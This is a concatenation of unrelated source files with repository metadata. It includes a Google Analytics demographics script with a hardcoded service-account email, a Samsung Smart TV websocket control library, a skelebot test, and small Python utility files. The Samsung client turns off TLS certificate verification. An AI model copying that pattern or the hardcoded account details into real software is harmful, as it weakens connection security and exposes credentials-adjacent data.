municipalities_list = ['Bartlett', 'Palatine', 'Lisle', 'Lakewood', 'Winfield', 'Carol Stream', 'Downers Grove', 'Westmont', 'Kildeer', 'Glen Ellyn', 'Burr Ridge', 'Long Grove', 'Barrington Hills', 'Wayne', 'Naperville', 'Forest Lake', 'Trout Valley', 'Rolling Meadows', 'Inverness', 'Clarendon Hills', 'St. Charles', 'South Barrington', 'Deer Park', 'Algonquin', 'Hoffman Estates', 'Wheaton', 'Lombard', 'Lake Zurich', 'Port Barrington', 'Hawthorn Woods', 'East Dundee', 'Fox River Grove', 'Lake in the Hills', 'Crystal Lake', 'Darien', 'Oakwood Hills', 'West Dundee', 'Oakbrook Terrace', 'Sleepy Hollow', 'Hinsdale', 'South Elgin', 'Lake Barrington', 'Gilberts', 'Tower Lakes', 'Cary', 'Willowbrook', 'North Barrington', 'Carpentersville', 'Oak Brook', 'Warrenville', 'Elgin', 'Willowbrook', 'West Chicago', 'Barrington']
SCOPES = ['https://www.googleapis.com/auth/analytics.readonly']
SERVICE_ACCOUNT_EMAIL = 'ejerzyk@phonic-server-203118.iam.gserviceaccount.com'
KEY_FILE_LOCATION = 'client_secrets.json'
VIEW_ID = '154261248'
def initialize_analyticsreporting():
"""Initializes an Analytics Reporting API V4 service object.
Returns:
An authorized Analytics Reporting API V4 service object.
"""
credentials = ServiceAccountCredentials.from_json_keyfile_name(
KEY_FILE_LOCATION, SCOPES)
# Build the service object.
analytics = build('analyticsreporting', 'v4', credentials=credentials)
return analytics
def get_report(analytics, dims, dateranges):
"""Queries the Analytics Reporting API V4.
Args:
analytics: An authorized Analytics Reporting API V4 service object.
Returns:
The Analytics Reporting API V4 response.
"""
return analytics.reports().batchGet(
body={
'reportRequests': [
{
'viewId': VIEW_ID,
'dateRanges': dateranges,
'metrics': [{'expression': 'ga:sessions'}],
'dimensions': [dims]
}]
}
).execute()
def print_response(response):
"""Parses and prints the Analytics Reporting API V4 response.
Args:
response: An Analytics Reporting API V4 response.
"""
printP = False
mun = ''
age = ''
gen = ''
for report in response.get('reports', []):
columnHeader = report.get('columnHeader', {})
dimensionHeaders = columnHeader.get('dimensions', [])
metricHeaders = columnHeader.get('metricHeader', {}).get('metricHeaderEntries', [])
to_return = {}
for row in report.get('data', {}).get('rows', []):
dimensions = row.get('dimensions', [])
dateRangeValues = row.get('metrics', [])
for header, dimension in zip(dimensionHeaders, dimensions):
print header + ": " + dimension
if header=='ga:city' and dimension in municipalities_list:
mun = dimension
printP = True
elif header=='ga:userGender': gen = dimension
elif header=='ga:userAgeBracket': age = dimension
for i, values in enumerate(dateRangeValues):
for metricHeader, value in zip(metricHeaders, values.get('values')):
value = int(value)
if printP:
if gen!='' and age!='':
if mun in to_return.keys():
if age in to_return[mun].keys(): to_return[mun][age][gen] = value
else: to_return[mun] = {age: {gen: value}}
else: to_return[mun] = {age: {gen: value}}
elif gen!='':
if mun in to_return.keys(): to_return[mun][gen] = value
else: to_return[mun] = {gen: value}
elif age!='':
if mun in to_return.keys(): to_return[mun][age] = value
else: to_return[mun] = {age: value}
else: to_return[mun] = value
return to_return
def LA(dateranges):
analytics = initialize_analyticsreporting()
response = get_report(analytics, [{'name': 'ga:city'}, {'name':'ga:userAgeBracket'}], dateranges)
d = print_response(response)
total_18_24 = 0
total_25_34 = 0
total_35_44 = 0
total_45_54 = 0
total_55_64 = 0
total_65 = 0
for city in d.keys():
print city
total_18_24 += int(d[city].get('18-24',0))
total_25_34 += int(d[city].get('25-34',0))
total_35_44 += int(d[city].get('35-44',0))
total_45_54 += int(d[city].get('45-54',0))
total_55_64 += int(d[city].get('55-64',0))
total_65 += int(d[city].get('65+',0))
for city in d.keys():
d[city]['18-24'] = float(d[city].get('18-24',0))/total_18_24
d[city]['25-34'] = float(d[city].get('25-34',0))/total_25_34
d[city]['35-44'] = float(d[city].get('35-44',0))/total_35_44
d[city]['45-54'] = float(d[city].get('45-54',0))/total_45_54
d[city]['55-64'] = float(d[city].get('55-64',0))/total_55_64
d[city]['65+'] = float(d[city].get('65+',0))/total_65
for city in municipalities_list:
if city not in d.keys():
d[city] = {}
d[city]['18-24'] = 0
d[city]['25-34'] = 0
d[city]['35-44'] = 0
d[city]['45-54'] = 0
d[city]['55-64'] = 0
d[city]['65+'] = 0
return d
def LG(dateranges):
analytics = initialize_analyticsreporting()
response = get_report(analytics, [{'name': 'ga:city'}, {'name':'ga:userGender'}], dateranges)
d = print_response(response)
total_female = 0
total_male = 0
for city in d.keys():
total_female = total_female + d[city].get('female',0)
total_male = total_male + d[city].get('male',0)
for city in d.keys():
d[city]['female'] = float(d[city].get('female',0))/total_female
d[city]['male'] = float(d[city].get('male',0))/total_male
for city in municipalities_list:
if city not in d.keys():
d[city] = {}
d[city]['female'] = 0
d[city]['male'] = 0
return d
def L(dateranges):
analytics = initialize_analyticsreporting()
response = get_report(analytics, [{'name': 'ga:city'}],dateranges)
d = print_response(response)
total = 0
for city in d.keys(): total = total + d[city]
for city in d.keys(): d[city] = float(d[city])/total
for city in municipalities_list:
if city not in d.keys(): d[city] = 0
return d
def main():
# LA
output_filename = 'LA.js'
d = {'1mo': LA([{'startDate': '2018-04-08', 'endDate': 'today'}]), '3mo': LA([{'startDate': '2018-02-08', 'endDate': 'today'}]), '1yr': LA([{'startDate': '2017-05-08', 'endDate': 'today'}])}
output_f = open(output_filename, 'w')
output_f.write("var la = " + json.dumps(d) + ";")
output_f = open(output_filename + 'on', 'w')
output_f.write(json.dumps(d))
# LG
output_filename = 'LG.js'
d = {'1mo': LG([{'startDate': '2018-04-08', 'endDate': 'today'}]), '3mo': LG([{'startDate': '2018-02-08', 'endDate': 'today'}]), '1yr': LG([{'startDate': '2017-05-08', 'endDate': 'today'}])}
output_f = open(output_filename, 'w')
output_f.write("var lg = " + json.dumps(d) + ";")
output_f = open(output_filename + 'on', 'w')
output_f.write(json.dumps(d))
# L
output_filename = 'L.js'
d = {'1mo': L([{'startDate': '2018-04-08', 'endDate': 'today'}]), '3mo': L([{'startDate': '2018-02-08', 'endDate': 'today'}]), '1yr': L([{'startDate': '2017-05-08', 'endDate': 'today'}])}
output_f = open(output_filename, 'w')
output_f.write("var l = " + json.dumps(d) + ";")
output_f = open(output_filename + 'on', 'w')
output_f.write(json.dumps(d))
if __name__ == '__main__':
main()
| [
"ejerzyk@gmail.com"
] | ejerzyk@gmail.com |
b08dd544b2f32a4764ba76171b76226e77090569 | 2628f51ef7ab5aae691dc72556ab312cc5b2a876 | /venv/lib/python3.8/site-packages/unyt/_version.py | c41cbda0701c4538c26555538502bd76e89985b4 | [
"BSD-3-Clause"
] | permissive | Jack-kelly-22/ps-4 | f933a8bb7bf5c865d846a30a5e0c8352c448a18d | fbbf327f1717bbd1902f437147640dfdf6aa118c | refs/heads/master | 2023-02-10T23:56:48.499720 | 2021-01-05T21:43:59 | 2021-01-05T21:43:59 | 327,124,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py |
# This file was generated by 'versioneer.py' (0.18) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
version_json = '''
{
"date": "2020-10-05T14:17:00-0600",
"dirty": false,
"error": null,
"full-revisionid": "eeefa00a2fddbf0dba6ab854e968ef43e31f851e",
"version": "v2.8.0"
}
''' # END VERSION_JSON
def get_versions():
return json.loads(version_json)
| [
"Jacklaxjk@gmail.com"
] | Jacklaxjk@gmail.com |
0da9380cc1898690b9c39d5b4b7ff4392ed376b1 | 753a03d58940847b76203e39b8cb60d775bc8370 | /test/test_systems_generators_dockerignore.py | d95c632c27a1cd1a45a647dd3008e979abe95f4c | [
"MIT"
] | permissive | SanthoshBala18/skelebot | 912d84abef113f86eeb6b05f50ae9c2bd6115d45 | 13055dba1399b56a76a392699aa0aa259ca916a9 | refs/heads/master | 2020-08-03T15:24:11.105137 | 2019-09-27T15:12:25 | 2019-09-27T15:12:25 | 211,799,653 | 0 | 0 | MIT | 2019-09-30T07:19:27 | 2019-09-30T07:19:27 | null | UTF-8 | Python | false | false | 1,284 | py | from unittest import TestCase
from unittest import mock
import skelebot as sb
import os
class TestDockerignore(TestCase):
path = ""
config = None
# Get the path to the current working directory before we mock the function to do so
def setUp(self):
self.path = os.getcwd()
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerignore(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/.dockerignore".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
self.config = sb.systems.generators.yaml.loadConfig()
expected= """
# This dockerignore was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
**/*.zip
**/*.RData
**/*.pkl
**/*.csv
**/*.model
**/*.pyc
"""
sb.systems.generators.dockerignore.buildDockerignore(self.config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expected)
if __name__ == '__main__':
unittest.main()
| [
"noreply@github.com"
] | SanthoshBala18.noreply@github.com |
b768abfeda8056001f6bd64fe0e1e40d66c85e89 | c7bb49430a2651955e545c3ae4907e870a7f2568 | /patterns/Observer/observer.py | 504ceae4e97e41bceceda740bb0b9bffbce54681 | [] | no_license | jvrcavalcanti/Algorithms | 133dd29d985c41560b212ed1b204d8220bd89bc9 | d83f8e61d959e9da970d6270b373eaea39701927 | refs/heads/master | 2020-12-31T22:34:25.696750 | 2020-06-16T18:25:58 | 2020-06-16T18:25:58 | 239,056,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | from abc import ABC, abstractmethod
class Observer():
@abstractmethod
def handle(self, state):
pass | [
"jonnyvictor01@gmail.com"
] | jonnyvictor01@gmail.com |
f06e6cd20ffd0594a254af576292149542c248bf | 7d57247e1cefc7dfdd4c12a745366fae5e413a11 | /tests/conftest.py | 9731d89f424cc00aa2b48745e73b0a2e2a1149b7 | [
"BSD-2-Clause"
] | permissive | chintal/sphinxcontrib-collations | 6920314dddba4eea7b059028a9cb2c7dba9e3121 | dd2b7f449bf025695fb25a4c685fd3ab9b1c6c53 | refs/heads/master | 2020-06-21T09:12:09.492796 | 2019-07-17T13:14:03 | 2019-07-17T14:22:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | """
pytest config for sphinxcontrib/collations/tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2017 by Chintalagiri Shashank <shashank.chintalagiri@gmail.com>
:license: BSD, see LICENSE for details.
"""
pytest_plugins = 'sphinx.testing.fixtures'
| [
"shashank.chintalagiri@gmail.com"
] | shashank.chintalagiri@gmail.com |
89a610ca7cd1c5022c19cb112a2eab06b5bf334a | e9b06f7b8b210c550879c1e8c484b42719ccd633 | /custom_components/samsungtv_smart/api/samsungws.py | be8b20e1dd6ee7b4498cd6934fd4be4cf43f6dcf | [] | no_license | eplantequebec/Home-Assistant-Config | a5b69d3e2fa21068dc15b20a8988a24440140300 | ed05566ee476ec4490efa9b9d5bfdf55fca9a808 | refs/heads/master | 2021-08-17T00:11:15.805600 | 2021-07-18T23:40:23 | 2021-07-18T23:40:23 | 201,519,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,202 | py | """
SamsungTVWS - Samsung Smart TV WS API wrapper
Copyright (C) 2019 Xchwarze
Copyright (C) 2020 Ollo69
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
import base64
import json
import logging
import re
import requests
import ssl
import subprocess
import sys
import time
import uuid
import websocket
from datetime import datetime
from enum import Enum
from threading import Thread, Lock
from yarl import URL
from . import exceptions
from . import shortcuts
PING_MATCHER = re.compile(
r"(?P<min>\d+.\d+)\/(?P<avg>\d+.\d+)\/(?P<max>\d+.\d+)\/(?P<mdev>\d+.\d+)"
)
PING_MATCHER_BUSYBOX = re.compile(
r"(?P<min>\d+.\d+)\/(?P<avg>\d+.\d+)\/(?P<max>\d+.\d+)"
)
WIN32_PING_MATCHER = re.compile(r"(?P<min>\d+)ms.+(?P<max>\d+)ms.+(?P<avg>\d+)ms")
MIN_APP_SCAN_INTERVAL = 10
MAX_WS_PING_INTERVAL = 10
TYPE_DEEP_LINK = "DEEP_LINK"
TYPE_NATIVE_LAUNCH = "NATIVE_LAUNCH"
_LOGGING = logging.getLogger(__name__)
def gen_uuid():
return str(uuid.uuid4())
class App:
def __init__(self, app_id, app_name, app_type):
self.app_id = app_id
self.app_name = app_name
self.app_type = app_type
class ArtModeStatus(Enum):
Unsupported = 0
Unavailable = 1
Off = 2
On = 3
class Ping:
"""The Class for handling the data retrieval."""
def __init__(self, host, count):
"""Initialize the data object."""
self._ip_address = host
self._count = count
self.available = False
if sys.platform == "win32":
self._ping_cmd = [
"ping",
"-n",
str(self._count),
"-w",
"2000",
self._ip_address,
]
else:
self._ping_cmd = [
"ping",
"-n",
"-q",
"-c",
str(self._count),
"-W2",
self._ip_address,
]
def ping(self):
"""Send ICMP echo request and return details if success."""
pinger = subprocess.Popen(
self._ping_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
try:
out = pinger.communicate()
_LOGGING.debug("Output is %s", str(out))
if sys.platform == "win32":
match = WIN32_PING_MATCHER.search(str(out).split("\n")[-1])
rtt_min, rtt_avg, rtt_max = match.groups()
elif "max/" not in str(out):
match = PING_MATCHER_BUSYBOX.search(str(out).split("\n")[-1])
rtt_min, rtt_avg, rtt_max = match.groups()
else:
match = PING_MATCHER.search(str(out).split("\n")[-1])
rtt_min, rtt_avg, rtt_max, rtt_mdev = match.groups()
return True
except (subprocess.CalledProcessError, AttributeError):
return False
class SamsungTVWS:
_WS_ENDPOINT_REMOTE_CONTROL = "/api/v2/channels/samsung.remote.control"
_WS_ENDPOINT_APP_CONTROL = "/api/v2"
_WS_ENDPOINT_ART = "/api/v2/channels/com.samsung.art-app"
_REST_URL_FORMAT = "http://{host}:8001/api/v2/{append}"
def __init__(
self,
host,
token=None,
token_file=None,
port=8001,
timeout=None,
key_press_delay=1,
name="SamsungTvRemote",
app_list=None,
):
self.host = host
self.token = token
self.token_file = token_file
self.port = port
self.timeout = None if timeout == 0 else timeout
self.key_press_delay = key_press_delay
self.name = name
self.connection = None
self._app_list = app_list
self._artmode_status = ArtModeStatus.Unsupported
self._power_on_requested = False
self._power_on_requested_time = datetime.min
self._installed_app = {}
self._running_app = None
self._app_type = {}
self._sync_lock = Lock()
self._last_app_scan = datetime.min
self._last_ping = datetime.min
self._is_connected = False
self._ws_remote = None
self._client_remote = None
self._ws_control = None
self._client_control = None
self._ws_art = None
self._client_art = None
self._client_art_supported = 2
self._ping = Ping(self.host, 1)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def _serialize_string(self, string):
if isinstance(string, str):
string = str.encode(string)
return base64.b64encode(string).decode("utf-8")
def _is_ssl_connection(self):
return self.port == 8002
def _format_websocket_url(self, path, is_ssl=False, use_token=True):
scheme = "wss" if is_ssl else "ws"
if is_ssl and use_token:
token = self._get_token()
else:
token = ""
new_uri = URL.build(
scheme=scheme,
host=self.host,
port=self.port,
path=path,
query={"name": self._serialize_string(self.name)}
)
if token:
return str(new_uri.update_query({"token": token}))
return str(new_uri)
def _format_rest_url(self, append=""):
params = {
"host": self.host,
"append": append,
}
return self._REST_URL_FORMAT.format(**params)
def _get_token(self):
if self.token_file is not None:
try:
with open(self.token_file, "r") as token_file:
return token_file.readline()
except:
return ""
else:
return self.token
def _set_token(self, token):
_LOGGING.info("New token %s", token)
if self.token_file is not None:
_LOGGING.debug("Save token to file", token)
with open(self.token_file, "w") as token_file:
token_file.write(token)
else:
self.token = token
def _ws_send(self, command, key_press_delay=None, *, use_control=False, ws_socket=None):
using_remote = False
if not use_control:
if self._ws_remote:
connection = self._ws_remote
using_remote = True
else:
connection = self.open()
elif ws_socket:
connection = ws_socket
else:
return
payload = json.dumps(command)
connection.send(payload)
if using_remote:
# we consider a message sent valid as a ping
self._last_ping = datetime.now()
if key_press_delay is None:
time.sleep(self.key_press_delay)
elif key_press_delay > 0:
time.sleep(key_press_delay)
def _rest_request(self, target, method="GET"):
url = self._format_rest_url(target)
try:
if method == "POST":
return requests.post(url, timeout=self.timeout)
elif method == "PUT":
return requests.put(url, timeout=self.timeout)
elif method == "DELETE":
return requests.delete(url, timeout=self.timeout)
else:
return requests.get(url, timeout=self.timeout)
except requests.ConnectionError:
raise exceptions.HttpApiError(
"TV unreachable or feature not supported on this model."
)
def _process_api_response(self, response):
try:
return json.loads(response)
except json.JSONDecodeError:
_LOGGING.debug(
"Failed to parse response from TV. response text: %s", response
)
raise exceptions.ResponseError(
"Failed to parse response from TV. Maybe feature not supported on this model"
)
def _client_remote_thread(self):
if self._ws_remote:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_REMOTE_CONTROL,
is_ssl=is_ssl
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_remote = websocket.WebSocketApp(
url,
on_message=self._on_message_remote,
on_ping=self._on_ping_remote,
)
_LOGGING.debug("Thread SamsungRemote started")
# we set ping interval (1 hour) only to enable multi-threading mode
# on socket. TV do not answer to ping but send ping to client
self._ws_remote.run_forever(
sslopt=sslopt, ping_interval=3600, ping_timeout=2
)
self._is_connected = False
if self._ws_art:
self._ws_art.close()
if self._ws_control:
self._ws_control.close()
self._ws_remote.close()
self._ws_remote = None
_LOGGING.debug("Thread SamsungRemote terminated")
def _on_ping_remote(self, payload):
_LOGGING.debug("Received ping %s, sending pong", payload)
self._last_ping = datetime.now()
if self._ws_remote.sock:
try:
self._ws_remote.sock.pong(payload)
except Exception as ex:
_LOGGING.warning("send_pong failed: {}".format(ex))
def _on_message_remote(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
event = response.get("event")
if not event:
return
# we consider a message valid as a ping
self._last_ping = datetime.now()
if event == "ms.channel.connect":
_LOGGING.debug("Message remote: received connect")
if response.get("data") and response.get("data").get("token"):
token = response.get("data").get("token")
_LOGGING.debug("Got token %s", token)
self._set_token(token)
self._is_connected = True
self._request_apps_list()
self.start_client(start_all=True)
elif event == "ed.installedApp.get":
_LOGGING.debug("Message remote: received installedApp")
self._handle_installed_app(response)
# self.start_client(start_all=True)
elif event == "ed.edenTV.update":
_LOGGING.debug("Message remote: received edenTV")
self.get_running_app(force_scan=True)
def _request_apps_list(self):
_LOGGING.debug("Request app list")
self._ws_send(
{
"method": "ms.channel.emit",
"params": {"event": "ed.installedApp.get", "to": "host"},
},
key_press_delay=0,
)
def _handle_installed_app(self, response):
list_app = response.get("data", {}).get("data")
installed_app = {}
for app_info in list_app:
app_id = app_info["appId"]
_LOGGING.debug("Found app: %s", app_id)
app = App(app_id, app_info["name"], app_info["app_type"])
installed_app[app_id] = app
self._installed_app = installed_app
def _client_control_thread(self):
if self._ws_control:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_APP_CONTROL,
is_ssl=is_ssl,
use_token=False
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_control = websocket.WebSocketApp(
url,
on_message=self._on_message_control,
)
_LOGGING.debug("Thread SamsungControl started")
self._ws_control.run_forever(sslopt=sslopt)
self._ws_control.close()
self._ws_control = None
_LOGGING.debug("Thread SamsungControl terminated")
def _on_message_control(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
result = response.get("result")
if result:
self._set_running_app(response)
return
error = response.get("error")
if error:
self._manage_control_err(response)
return
event = response.get("event")
if not event:
return
if event == "ms.channel.connect":
_LOGGING.debug("Message control: received connect")
self.get_running_app()
def _set_running_app(self, response):
app_id = response.get("id")
if not app_id:
return
result = response.get("result")
if result is None:
return
elif isinstance(result, bool):
is_running = result
else:
is_running = result.get("visible")
if is_running is None:
return
if self._running_app:
if is_running and app_id != self._running_app:
_LOGGING.debug("app running: %s", app_id)
self._running_app = app_id
elif not is_running and app_id == self._running_app:
_LOGGING.debug("app stopped: %s", app_id)
self._running_app = None
elif is_running:
_LOGGING.debug("app running: %s", app_id)
self._running_app = app_id
def _manage_control_err(self, response):
app_id = response.get("id")
if not app_id:
return
error_code = response.get("error", {}).get("code", 0)
if error_code == 404: # Not found error
if self._installed_app:
if app_id not in self._installed_app:
_LOGGING.error("App ID %s not found", app_id)
return
# app_type = self._app_type.get(app_id)
# if app_type is None:
# _LOGGING.info(
# "App ID %s with type DEEP_LINK not found, set as NATIVE_LAUNCH",
# app_id,
# )
# self._app_type[app_id] = 4
def _get_app_status(self, app_id, app_type):
_LOGGING.debug("Get app status: AppID: %s, AppType: %s", app_id, app_type)
# if app_type == 4:
# method = "ms.webapplication.get"
# else:
# method = "ms.application.get"
if app_type == 4: # app type 4 always return not found error
return
method = "ms.application.get"
self._ws_send(
{
"id": app_id,
"method": method,
"params": {"id": app_id},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_control,
)
def _client_art_thread(self):
if self._ws_art:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_ART,
is_ssl=is_ssl,
use_token=False
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_art = websocket.WebSocketApp(
url,
on_message=self._on_message_art,
)
_LOGGING.debug("Thread SamsungArt started")
self._ws_art.run_forever(sslopt=sslopt)
self._ws_art.close()
self._ws_art = None
_LOGGING.debug("Thread SamsungArt terminated")
def _on_message_art(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
event = response.get("event")
if not event:
return
if event == "ms.channel.connect":
_LOGGING.debug("Message art: received connect")
self._client_art_supported = 1
elif event == "ms.channel.ready":
_LOGGING.debug("Message art: channel ready")
self._get_artmode_status()
elif event == "d2d_service_message":
_LOGGING.debug("Message art: d2d message")
self._handle_artmode_status(response)
def _get_artmode_status(self):
_LOGGING.debug("Sending get_art_status")
msg_data = {
"request": "get_artmode_status",
"id": gen_uuid(),
}
self._ws_send(
{
"method": "ms.channel.emit",
"params": {
"data": json.dumps(msg_data),
"to": "host",
"event": "art_app_request",
},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_art,
)
def _handle_artmode_status(self, response):
data_str = response.get("data")
if not data_str:
return
data = self._process_api_response(data_str)
event = data.get("event", "")
if event == "art_mode_changed":
status = data.get("status", "")
if status == "on":
artmode_status = ArtModeStatus.On
else:
artmode_status = ArtModeStatus.Off
elif event == "artmode_status":
value = data.get("value", "")
if value == "on":
artmode_status = ArtModeStatus.On
else:
artmode_status = ArtModeStatus.Off
elif event == "go_to_standby":
artmode_status = ArtModeStatus.Unavailable
elif event == "wakeup":
self._get_artmode_status()
return
else:
# Unknown message
return
if self._power_on_requested and artmode_status != ArtModeStatus.Unavailable:
if artmode_status == ArtModeStatus.On:
self.send_key("KEY_POWER", key_press_delay=0)
self._power_on_requested = False
self._artmode_status = artmode_status
@property
def is_connected(self):
return self._is_connected
@property
def artmode_status(self):
return self._artmode_status
@property
def installed_app(self):
return self._installed_app
@property
def running_app(self):
return self._running_app
def ping_device(self):
result = self._ping.ping()
# check ws ping/pong
call_time = datetime.now()
if result and self._ws_remote:
difference = (call_time - self._last_ping).total_seconds()
result = difference < MAX_WS_PING_INTERVAL
if not result:
self.stop_client()
if self._artmode_status != ArtModeStatus.Unsupported:
self._artmode_status = ArtModeStatus.Unavailable
if self._power_on_requested:
difference = (call_time - self._power_on_requested_time).total_seconds()
if difference > 20:
self._power_on_requested = False
return result
def set_power_on_request(self):
self._power_on_requested = True
self._power_on_requested_time = datetime.now()
def get_running_app(self, *, force_scan=False):
if not self._ws_control:
return
with self._sync_lock:
call_time = datetime.now()
difference = (call_time - self._last_app_scan).total_seconds()
if (difference < MIN_APP_SCAN_INTERVAL and not force_scan) or difference < 1:
return
self._last_app_scan = call_time
if self._app_list is not None:
app_to_check = {}
for app_name, app_id in self._app_list.items():
app = None
if self._installed_app:
app = self._installed_app.get(app_id)
else:
app_type = self._app_type.get(app_id, 2)
if app_type <= 4:
app = App(app_id, app_name, app_type)
if app:
app_to_check[app_id] = app
else:
app_to_check = self._installed_app
for app in app_to_check.values():
self._get_app_status(app.app_id, app.app_type)
def start_client(self, *, start_all=False):
"""Start all thread that connect to the TV websocket"""
if self._client_remote is None or not self._client_remote.is_alive():
self._client_remote = Thread(target=self._client_remote_thread)
self._client_remote.name = "SamsungRemote"
self._client_remote.setDaemon(True)
self._client_remote.start()
if start_all:
if self._client_control is None or not self._client_control.is_alive():
self._client_control = Thread(target=self._client_control_thread)
self._client_control.name = "SamsungControl"
self._client_control.setDaemon(True)
self._client_control.start()
if (
self._client_art_supported > 0 and
(self._client_art is None or not self._client_art.is_alive())
):
if self._client_art_supported > 1:
self._client_art_supported = 0
self._client_art = Thread(target=self._client_art_thread)
self._client_art.name = "SamsungArt"
self._client_art.setDaemon(True)
self._client_art.start()
def stop_client(self):
if self._ws_remote:
self._ws_remote.close()
def open(self):
if self.connection is not None:
return self.connection
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_REMOTE_CONTROL,
is_ssl=is_ssl
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
_LOGGING.debug("WS url %s", url)
connection = websocket.create_connection(url, self.timeout, sslopt=sslopt)
response = self._process_api_response(connection.recv())
if response["event"] == "ms.channel.connect":
if response.get("data") and response.get("data").get("token"):
token = response.get("data").get("token")
_LOGGING.debug("Got token %s", token)
self._set_token(token)
else:
self.close()
raise exceptions.ConnectionFailure(response)
self.connection = connection
return connection
def close(self):
if self.connection:
self.connection.close()
self.connection = None
_LOGGING.debug("Connection closed.")
def send_key(self, key, key_press_delay=None, cmd="Click"):
_LOGGING.debug("Sending key %s", key)
self._ws_send(
{
"method": "ms.remote.control",
"params": {
"Cmd": cmd,
"DataOfCmd": key,
"Option": "false",
"TypeOfRemote": "SendRemoteKey",
},
},
key_press_delay,
)
def hold_key(self, key, seconds):
self.send_key(key, key_press_delay=0, cmd="Press")
time.sleep(seconds)
self.send_key(key, key_press_delay=0, cmd="Release")
def move_cursor(self, x, y, duration=0):
self._ws_send(
{
"method": "ms.remote.control",
"params": {
"Cmd": "Move",
"Position": {"x": x, "y": y, "Time": str(duration)},
"TypeOfRemote": "ProcessMouseDevice",
},
},
key_press_delay=0,
)
def run_app(self, app_id, action_type="", meta_tag="", *, use_remote=False):
if not action_type:
app = self._installed_app.get(app_id)
if app:
app_type = app.app_type
else:
app_type = self._app_type.get(app_id, 2)
action_type = TYPE_DEEP_LINK if app_type == 2 else TYPE_NATIVE_LAUNCH
elif action_type != TYPE_NATIVE_LAUNCH:
action_type = TYPE_DEEP_LINK
_LOGGING.debug(
"Sending run app app_id: %s app_type: %s meta_tag: %s",
app_id,
action_type,
meta_tag,
)
if self._ws_control and action_type == TYPE_DEEP_LINK and not use_remote:
self._ws_send(
{
"id": app_id,
"method": "ms.application.start",
"params": {"id": app_id},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_control,
)
return
self._ws_send(
{
"method": "ms.channel.emit",
"params": {
"event": "ed.apps.launch",
"to": "host",
"data": {
# action_type: NATIVE_LAUNCH / DEEP_LINK
# app_type == 2 ? 'DEEP_LINK' : 'NATIVE_LAUNCH',
"action_type": action_type,
"appId": app_id,
"metaTag": meta_tag,
},
},
},
key_press_delay=0,
)
def open_browser(self, url):
_LOGGING.debug("Opening url in browser %s", url)
self.run_app("org.tizen.browser", TYPE_NATIVE_LAUNCH, url)
def rest_device_info(self):
_LOGGING.debug("Get device info via rest api")
response = self._rest_request("")
return self._process_api_response(response.text)
def rest_app_status(self, app_id):
_LOGGING.debug("Get app %s status via rest api", app_id)
response = self._rest_request("applications/" + app_id)
return self._process_api_response(response.text)
def rest_app_run(self, app_id):
_LOGGING.debug("Run app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "POST")
return self._process_api_response(response.text)
def rest_app_close(self, app_id):
_LOGGING.debug("Close app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "DELETE")
return self._process_api_response(response.text)
def rest_app_install(self, app_id):
_LOGGING.debug("Install app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "PUT")
return self._process_api_response(response.text)
def shortcuts(self):
return shortcuts.SamsungTVShortcuts(self)
| [
"eric@plante.ca"
] | eric@plante.ca |
2b6516b8357caff161af954e665fc30dd6a1ad1e | 8bb6e8535c12c541866ad87fbd221750c7dac127 | /lib/kb_irep/kb_irepImpl.py | 0794129841b97942c4a676c5bd19fb284a692a7c | [
"MIT"
] | permissive | jungbluth/kb_irep | 1a0caa793133ec587a0cf8b8de4154c2bb5c82aa | 55c8f2bfb3ccba74d3418dec31acf6d9630b1ac5 | refs/heads/master | 2021-07-18T06:00:00.508236 | 2020-12-30T20:26:15 | 2020-12-30T20:26:15 | 227,967,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,768 | py | # -*- coding: utf-8 -*-
#BEGIN_HEADER
import logging
import os
from installed_clients.KBaseReportClient import KBaseReport
#END_HEADER
class kb_irep:
'''
Module Name:
kb_irep
Module Description:
A KBase module: kb_irep
'''
######## WARNING FOR GEVENT USERS ####### noqa
# Since asynchronous IO can lead to methods - even the same method -
